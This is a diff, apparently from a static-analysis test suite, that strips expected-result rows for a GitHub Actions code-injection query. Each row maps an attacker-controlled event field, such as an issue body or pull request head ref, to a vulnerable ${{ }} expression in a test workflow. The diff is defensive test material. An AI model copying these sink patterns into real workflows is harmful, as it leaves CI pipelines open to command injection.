@@ -38,7 +38,7 @@ jobs: persist-credentials: false ref: ${{ steps.get-sha.outputs.sha }} fetch-depth: 0 - - name: Get version # $ Source[actions/code-injection/critical] + - name: Get version id: get-version run: | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
